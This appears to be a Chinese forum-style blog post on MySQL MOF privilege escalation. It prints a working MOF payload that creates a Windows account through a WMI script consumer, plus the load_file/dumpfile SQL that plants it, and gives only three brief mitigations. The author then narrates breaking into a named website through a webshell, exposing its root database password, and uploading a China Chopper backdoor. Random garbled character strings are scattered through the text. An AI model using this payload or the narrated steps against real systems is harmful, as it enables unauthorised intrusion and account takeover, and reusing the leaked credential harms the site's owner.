Mysql mof扩展漏洞实例与防范

admin

Mysql mof扩展漏洞防范方法

网上公开的一些利用代码:

#pragma namespace(“\\\\.\\root\\subscription”)
. X3 t6 d$ x5 }1 G( [! m# W
* O! i- y* z2 b7 w- ?instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };

) M7 s7 |1 p- I+ Y
9 c* F& m, a1 R3 \4 X


, x+ z# J3 [: l7 A9 z7 m( l连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法：
+ v1 X/ M* F0 L7 a" e2 U( L+ R0 d
3 U. t2 {' B4 A& E1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数

2、禁止使用”WScript.Shel”组件
4 g" V1 c* L: W9 ~) j. _, a. K
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
/ ~5 s% o8 F- r
5 n  Z& G1 |$ [! U9 [0 l0 U2 i当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
% E- Y5 y$ u" W+ i$ P9 K& Y- E
8 |+ ], ]5 P* g: a9 d. P, ]事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权

3 Q, T: J0 k( A* k8 y! V4 B3 n但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
( y9 L' `* w! |& j* T, J( \
  w$ k. R- [: i( ~看懂了后就开始练手吧

http://www.webbmw.com/config/config_ucenter.php 一句话 a

$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。

于是直接用菜刀开搞

; t- o2 T; U+ K3 Q! x0 V上马先

0 W+ j7 `5 I! ~, r  S% r# `* o- a" x既然有了那些账号 之类的 于是我们就执行吧…….
( _5 Y4 {: A# p- b6 j- y8 o+ X2 v
% T4 @8 F2 d* d( M5 ]% W- ^小小的说下
4 w5 j, ?3 ]. A& ^" h
在这里第1次执行未成功        原因未知
+ a4 \5 T1 a: e. B5 ~9 W) {
" u% W' T/ [9 h5 f. r) D我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
* \, t$ z" d9 O8 G. v  f
#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };

我是将文件放到C:\WINDOWS\temp\1.mof
$ ~3 _% }2 K# |1 q# q+ J+ k9 U
% J- W2 h2 o) \" h" ^# |6 T; ~所以我们就改下执行的代码
: A8 i% s2 q0 N) j( s# D& Y
& ?8 A9 s, x* j+ d# O  X7 [' xselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

# Y* k: q& K, E0 ?/ f6 i! h
( P9 Q* }* O* S, z
但是 你会发现账号还是没有躺在那里。。

2 Z; ^; ?- M- P/ y- ?1 v于是我就感觉蛋疼

就去一个一个去执行 但是执行到第2个 mysql时就成功了………
8 A% ^2 A7 P0 j' O0 Z0 N

3 ]# ]2 Y6 _% A% D5 R- E8 {. F5 ^6 Y
但是其他库均不成功…
1 u7 @( Z3 V1 l! c& W
我就很费解呀 到底为什么不成功求大牛解答…
0 c/ F$ e! C2 E# ]
, f2 L8 f8 f3 I( j0 L- I8 U* ]0 u​
( @2 z- H8 `- i* A. X2 M5 L
, E3 H; Z7 h" g- Z* @. v" x